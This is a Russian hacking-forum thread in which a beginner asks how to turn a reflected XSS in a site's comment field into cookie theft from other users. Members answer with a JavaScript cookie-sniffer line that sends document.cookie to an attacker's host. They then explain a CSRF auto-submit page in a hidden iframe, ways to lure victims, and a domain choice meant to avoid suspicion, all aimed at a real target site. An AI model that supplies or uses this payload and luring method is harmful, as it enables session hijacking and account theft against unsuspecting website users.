HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов

Ответ

Опции темы Поиск в этой теме Опции просмотра

Старый 18.12.2012, 01:00
iHack3R
Участник форума
С нами: 7153526

Цитата:

Сообщение от Bugatti15047

Дак как же сделать ссылку, если уязвимость была найдена не в строке поиска сайта, а в стркое комментов.
Мне мои куки, конечно, вылазят, а как мне присобачит к этому снифер, да еще сделать так, чтобы он работал на этот сайте, если весь этот скрипт пашет только в строке комментарий?

JavaScript highlight

Код:
img =
new
Image
(); img.
src
=
"адрес сниффера?"
+
document
.
cookie
;

Старый 18.12.2012, 01:00
Bugatti15047
Новичок
С нами: 7052726

iHack3R,
Дак если я отправлю

source:

Код:
img = new Image(); img.src = "адрес сниффера?"+document.cookie;

Жертве, разве сработает? Где в скрипте строчка, что она должна работать именно на моем сайте?

Старый 19.12.2012, 01:00
Bugatti15047
Новичок

HPC'офцы =)
Помогите пожалуйста новичку
Поиск фильтрует ">", но в комментариях пропускает

source:

Код:
alert("xss");

IMAGE http://4put.ru/pictures/max/483/1483881.jpg

Если прописывать

source:

Код:

Все шикарно, на снифер отсылаются cookie
IMAGE http://4put.ru/pictures/max/483/1483888.jpg

Но как же реализовать такую ссылку, по которой переходя, жертва (пользователь сайта)
Отошлет мне cookie, я ведь не могу воспользоваться этим

source:

Код:

Отправка cookies, ведь, произойдет только в том случае, если жертва сама вобьет этот скрипт в коммент?

Nick Hander
Познавший АНТИЧАТ
С нами: 8484086

Ну если комментарии сохраняются на сайте и если после обновления страницы с комментариями каждый раз выскакивает алерт, то это активная xss, в данном случае тебе надо только отправить в комменте скрипт для кражи кук и заманить жертву на эту страницу. Если же алерт выскакивает только единожды после отправки комментария, а после обновления страницы не выскакивает, то это пассивка, тогда надо будет писать эксплуатирующий скрипт автосабмита или что-то в этом роде. По сути жертву тоже придется заманить на страницу, только уже на свою с кодом автосабмита.

p.s. не надо заставлять жертву саму что-то вводить=) Javascript давно уже все сам делает)

Bugatti15047
Новичок

Цитата:

Сообщение от Nick Hander

Ну если комментарии сохраняются на сайте и если после обновления страницы с комментариями каждый раз выскакивает алерт, то это активная xss, в данном случае тебе надо только отправить в комменте скрипт для кражи кук и заманить жертву на эту страницу. Если же алерт выскакивает только единожды после отправки комментария, а после обновления страницы не выскакивает, то это пассивка, тогда надо будет писать эксплуатирующий скрипт автосабмита или что-то в этом роде. По сути жертву тоже придется заманить на страницу, только уже на свою с кодом автосабмита.

p.s. не надо заставлять жертву саму что-то вводить=) Javascript давно уже все сам делает)

Однозначно на сайте пассивка,
Проблема в том, что я не могу ее реализовать,
Если бы она была через поиск, я бы смог (есть пример как)
А через коммент, я понятия не имею
Нужно каким то образом составить ссылку,с этим скриптом + скриптом сниффера,
Как это реализовать, я не знаю

Не могли бы вы подсказать?

Nick Hander
Познавший АНТИЧАТ

Ну один из вариантов таков - тебе надо создать свой сайт, на нем разместить страничку (любую). Затем создать вторую страничку скопировав туда код страницы уязвимого сайта с комментариями, добавив в тэг textarea в коде страницы свой текст для кражи куки и поставив автоисполнение формы при загрузке страницы в тэг body

Цитата:

Жертва зайдет на твою страницу, ничего не заметит, в это время у нее на страницы откроется твоя страница во фрейме, которая искуственно сделает эмуляцию того, что пользователь ввел сам скрипт в уязвимое поле. А куки придут тебе на сниффер.

Have fun!

Bugatti15047
Новичок

Цитата:

Сообщение от Nick Hander

Ну один из вариантов таков - тебе надо создать свой сайт, на нем разместить страничку (любую). Затем создать вторую страничку скопировав туда код страницы уязвимого сайта с комментариями, добавив в тэг textarea в коде страницы свой текст для кражи куки и поставив автоисполнение формы при загрузке страницы в тэг body

подробнее об этом почтитай в статье об CSRF (Cross Site Request Forgery). Она здесь есть. Затем на первую страницу поставь эту страницу с скрытом фрейме

Жертва зайдет на твою страницу, ничего не заметит, в это время у нее на страницы откроется твоя страница во фрейме, которая искуственно сделает эмуляцию того, что пользователь ввел сам скрипт в уязвимое поле. А куки придут тебе на сниффер.

Have fun!

Читаю, читает так легко!
Вопрос, нужен платный хостинг или сойдет любой?

И еще, не могли бы подкинуть ссылку на статью CSRF, пожалуйста

И последние, нет ли того, что вы расписали, но как то более подробно чтоли
А то видимо уровень знаний слишком низок, чтобы осознать и выполнить выше написанное без помощи

noizZzefan
Постоянный
С нами: 7473206

Цитата:

Сообщение от Bugatti15047

Читаю, читает так легко!

И последние, нет ли того, что вы расписали, но как то более подробно чтоли
А то видимо уровень знаний слишком низок, чтобы осознать и выполнить выше написанное без помощи

Знаешь, только Nick Hander расписал тебе настолько хорошо, что даже те кто не в теме поняли=)
Да и вообще, Nick всегда хорошо пишет !(отдельное спасибо)

Постараюсь объяснить, как сам понял.
Вообщем, сделай две странички.
На первой размести скрипт формы.
Его нужно поискать на странице, например :

HTML highlight

Код:
Ваш псевдоним :

Текст комментария :
Допустим ты нашёл что-то похожее.
Теперь, вставь такой код на страницу, которую ты создал(а у нас их две =) )

HTML highlight

Код:
Ваш псевдоним :

Текст комментария :

...
И сохрани эту первую страничку с названием 1.html.
Теперь создай вторую страничку.
Там напиши это :

HTML highlight

Код:

Теперь, если ты зайдешь на вот эту вторую страницу, у тебя автоматически отправится комментарий, с кодом для кражи кукисов =)

Nick Hander
Познавший АНТИЧАТ

Цитата:

noizZzefan

Пасиб за комплименты и за то, что расписал подробнее=) Я именно это имел в виду.

На самом деле незнающему человеку действительно не совсем понятно будет то, что я сказал. И самостоятельно выполнить это можно будучи знакомым с сутью уязвимостей, сутью xss и csrf. Так что тут действительно нужно более подробно разъяснить.

Цитата:

Bugatti15047

В дополнение к сказанному noizZzefan'ом отвечу на вопросы, которые ты мне лично задал.

Сойдет любой, даже без поддержки php. Пойдет и юкоз. Фокус в том, что тебе надо будет заманить жертву на свою страницу, которая ему будет интересна. Можно просто с копипастить страницу, как ты предполагаешь, интересную жертве (делается, например, через teleport или сохранением страницы как html документ с изображениями через оперу), и залить ее себе на хост. В ней уже прописывать фрейм. Факт в том, что пользователя может смутить домен "ucoz.net" или что-то в этом роде. Если боишься, что пользователь начнет подозревать, то придется тогда регать домен второго уровня, например в зоне .ru. Но хостинг платный делать совсем не обязательно.

Она в этом же форуме, закреплена в важных темах даже - XSRF (хотя правильнее называть CSRF, также как и XSS - CSS, правда css правильнее ассоциировать совсем с другим=))

iHack3R
Участник форума
С нами: 7153526

Bugatti15047 XSRF

Ответ